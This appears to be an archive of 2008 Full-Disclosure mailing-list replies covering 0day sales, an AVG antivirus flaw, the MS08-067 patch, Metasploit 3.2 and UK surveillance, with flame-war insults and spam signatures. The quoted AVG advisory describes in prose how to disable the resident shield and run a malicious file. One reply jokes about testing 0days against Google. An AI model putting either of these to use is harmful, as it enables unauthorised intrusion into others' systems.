I love waking up in the morning to read this! Ahh On Fri, Nov 7, 2008 at 10:39 AM, Anders Klixbull [EMAIL PROTECTED] wrote: The hardcore cockgobbler scene of scotland -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Elazar Broad Sent: 7. november 2008 07:34 To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 What scene... On Thu, 06 Nov 2008 20:06:47 -0500 n3td3v [EMAIL PROTECTED] wrote: i've been monitoring the scene since 1999 so what do you mean no experience? i make that about 10 years experience if my math is correct. On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee [EMAIL PROTECTED] wrote: Do you even understand why people dont like you? It is because you have all these crackpot ideas but no experience to back it up. All your ideas only make sense from a theoretical standpoint, but in practicality most will fail. On Fri, Nov 7, 2008 at 11:31 AM, n3td3v [EMAIL PROTECTED] wrote: blackhats like you will always hate on me, so i just ignore the negative responses i get. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQECAAYFAkkT4VIACgkQi04xwClgpZjqkQP/TCHzaFO3ngEhyXoJPlowTfzidJzg KyzTUAiLg4AKvqxXg+TSHiIkSDQWqCmzDr0qQ5OqywMgXmbWFNZzAdZuQtf5kW4KDBLx eclRU3VoqfSCcEMb6puLNQdnHudcVxxZk1dQQdBLlfddHRuX6sGllNkVVvtiaYPnK1U1 QxmDKXU= =bW8c -END PGP SIGNATURE- -- Click here to find old friends, lovers or family. http://tagline.hushmail.com/fc/Ioyw6h4fH5T0ZWneBo4QKHZMbrYp7sz9W8sLWHvUL RkY7oBbDmctTq/http://tagline.hushmail.com/fc/Ioyw6h4fH5T0ZWneBo4QKHZMbrYp7sz9W8sLWHvULRkY7oBbDmctTq/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
OT i really like the name you put up. Gmail asked me if i wanted to Invite some guy posting to full disclosure to chat On Mon, Nov 3, 2008 at 11:51 PM, Some Guy Posting To Full Disclosure [EMAIL PROTECTED] wrote: It's futile trying to use the law to change things. It will simply force people into the shadows. Which today involves using tor and some Russian web money account. I read a slogan from before my time, in a book: If source is outlawed outlaws will have source - same applies to zero days. Anyway I don't think it should be Illegal. I own a set of lock picks - I don't intend to break into someone's house. And if I did I'd go to jail (for the burglary and being equipped with picks), untill then I'm innocent. The UKs law has an attitude like that - I like it! Resources should go into actually preventing crimes taking place. Not stumbling around hoping that making it awkward for criminals to get the tools they need will make a difference. Simon. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Death of a Gay h4x0r!
He isn't so bad have some mercy ;) On 11/6/08, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Thu, 06 Nov 2008 10:54:36 +0100, Knud Erik Højgaard said: And now he accidentally the entire fleshlight! This sentence no verb. -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Odays offers
Test them against google and see if they work? On Tue, Nov 4, 2008 at 11:54 PM, John Allison [EMAIL PROTECTED] wrote: Why would a Whitehat want zone-h shutdown? That makes no sense at all. Date: Tue, 4 Nov 2008 13:57:56 + From: [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Odays offers now maybe he should shut down his zone-h site as well and keep whitehats happy :) On Tue, Nov 4, 2008 at 9:48 AM, Salvador III Manaois [EMAIL PROTECTED] wrote: sell 'em at wabisabilabi. ops, too late: http://www.techworld.com/security/news/index.cfm?newsID=106294 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Store, manage and share up to 5GB with Windows Live SkyDrive. Start uploading nowhttp://skydrive.live.com/welcome.aspx?provision=1?ocid=TXT_TAGLM_WL_skydrive_102008 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] AVG 8.0.173 flaw
For all people that use the free AVG you get what you paid for for all else On Wed, Nov 5, 2008 at 6:05 PM, Erik Harrison [EMAIL PROTECTED] wrote: leveraging the same access credentials and attack vector, an attacker could shut down the affected system without authorization. oh shit. time to patch! On Wed, Nov 5, 2008 at 10:49 AM, alessandro telami [EMAIL PROTECTED] wrote: What sort of vulnerability would this be??? Date: Wed, 5 Nov 2008 08:52:28 + From: [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] AVG 8.0.173 flaw AVG 8.0.173 flaw Nov 5, 2008 -- Affected Vendors: AVG Technologies -- Affected Products: AVG 8.0.173 -- Vulnerability Details: There is a flaw in AVG 8.0 that alow a user to shutdown the AVG Resident Shield Service via Task Manager temporarily and execute a malicious file while the AVG Resident Shield Service is restarting. Note: The AVG Resident Shield Service can be crashed, until next boot. -- Dificulty Level: low -- Vendor Response: None -- Disclosure Timeline: 2008-11-05 - Disclosure -- About: Fabio Pinheiro at http://dicas3000.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Get the best wallpapers on the Web - FREE. Click here! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows RPC MS08-067 FAQ document released
Try running a BinDiff and seeing what was changed. On Sat, Oct 25, 2008 at 10:50 PM, rholgstad [EMAIL PROTECTED] wrote: does securiteam do anything technical or just summarize crap from all over the web? also nice generic language about 'code execution', seeing how no one on your team can exploit or research it themselves Juha-Matti Laurio wrote: I have posted Frequently Asked Questions document about the Windows RPC, i.e. Server service vulnerability MS08-067. The document entitled as Microsoft Windows RPC Vulnerability MS08-067 (CVE-2008-4250) FAQ - October 2008 can be found at http://blogs.securiteam.com/index.php/archives/1150 The document describes Trojans related to this issue too. Juha-Matti ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Time to patch Windows boxes with MS08-067
We are still waiting to hear more about this Vulnerability. I guess the BinDiff will come out soon. On Thu, Oct 23, 2008 at 5:12 PM, Juha-Matti Laurio [EMAIL PROTECTED] wrote: The out-of-the cycle update from Microsoft is MS08-067 - Vulnerability in Server Service Could Allow Remote Code Execution: http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx Recommended workarounds: -Disable the Server and Computer Browser services -Block TCP ports 139 and 445 at the firewall As reported in Tuesday's advance notification all major Windows versions are affected, the bulletin rates Vista update as Important. Microsoft has updated their AV products to protect against this RPC issue too. Juha-Matti ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: UK government monitoring
I think the irony of the situation is that they have their CCTV cameras for years now and they didn't bring crime down. How will this database help? On Sun, Oct 12, 2008 at 8:35 PM, n3td3v [EMAIL PROTECTED] wrote: On 10 Oct, 11:56, Robin Wood [EMAIL PROTECTED] wrote: Looks like the UK government is going to start monitoring us a lot closer in the future: http://www.theregister.co.uk/2008/10/07/detica_interception_modernisation/ they are already doing it, you just don't know about it yet, oh you do now...because they want to start using the data for court cases, so the announcement has been made. if the government announce something, it usually means, we've tested this out already and it kicks ass, and now we want to make it official and no longer a secret, as we need to admit to a judge how we came to have certain evidence in order to convict people we want to take out the picture, either because they are an immediate risk to national security or are getting in the way of MI5/6/GCHQ strategic ambitions. if public opinion says no to the database, the database won't be taken away, it will still be there as an open secret. the only problem that arises is the data held would still only be able to be used by intelligence officers to coordinate operations, but couldn't be used to convict anybody. what's going on right now is, they want to use this database to convict people, so they had to make the announcement, however the database has always been there, and even if the public don't give it the go-ahead, even if it doesn't exist yet, they would just build it in secret anyway... however n3td3v believes the database is already in place. This news release is just a public acceptability test, for a database which is already in existence. n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Metasploit 3.2 Offers More 'Evil Deeds'
I think it's a nice tool, enabling people that cannot afford the more expensive (Core Impact or Immunity CANVAS) so still have a nice stable framework. On Thu, Oct 9, 2008 at 6:38 PM, H D Moore [EMAIL PROTECTED] wrote: You can find our SecTOR presentation online at: http://metasploit.com/research/conferences/ Grab an early of 3.2 (testing) from SVN: $ svn co http://metasploit.com/svn/framework3/trunk/ msf32/ A little bit about the new licensing (much more to follow): http://www.darkreading.com/document.asp?doc_id=165636WT.svl=news1_1 Metasploit is now officially an open-source project with a mostly-new group of developers behind it. We are still a week or two away from the final release, so keep an eye out for more information about the new features and improvements on the metasploit blog: http://metasploit.com/blog -HD PS. The Evil Deeds article is mostly correct, but some of the specific items were mangled in translation. The new EXE template does not allow you to turn a metasploit exploit into an EXE, it lets you take a metasploit payload+encoder into an EXE, big difference :-) On Thursday 09 October 2008, Ivan . wrote: Metasploit 3.2 looks like it rocks! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v group members important notice
Whoo dodged another one! On Tue, Oct 7, 2008 at 8:41 PM, Ed Carp [EMAIL PROTECTED] wrote: On Tue, Oct 7, 2008 at 8:24 PM, n3td3v [EMAIL PROTECTED] wrote: I'm sorry to those reading the archive on the web and those who were reading the group via RSS / Atom news readers, but in light of recent events, n3td3v is in lockdown and will not be reopening to non-registered users for the foreseeable future until I'm sure the threat has passed by. Target the lead vessel, Mr. Worf ... full spread ... FIRE! ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: cnn.com - Homeland Security seeks cyber counterattack system(Einstein 3.0)
The us government can't ever get their act together. It's just a waste of time On Mon, Oct 6, 2008 at 1:09 PM, Buhrmaster, Gary [EMAIL PROTECTED]wrote: Which is easier to shut down, an attack coming from a relatively small number of /16s that belong to the government, or one coming from the same number of source nodes scattered *all* over Comcast and Verizon and BT and a few other major providers? Hint 1: Consider the number of entry points into your network for the two cases, especially if you are heavily peered with one or more of the source ISPs. The Federal Government (through its Trusted Internet Connection initiative) is trying to limit the number of entry points into the US Government networks. (As I recall from 4000 interconnects to around 50, where both numbers have a high percentage of politics in the error bar.) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com/ http://www.jewelersdigest.com/ http://www.jewelerslounge.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
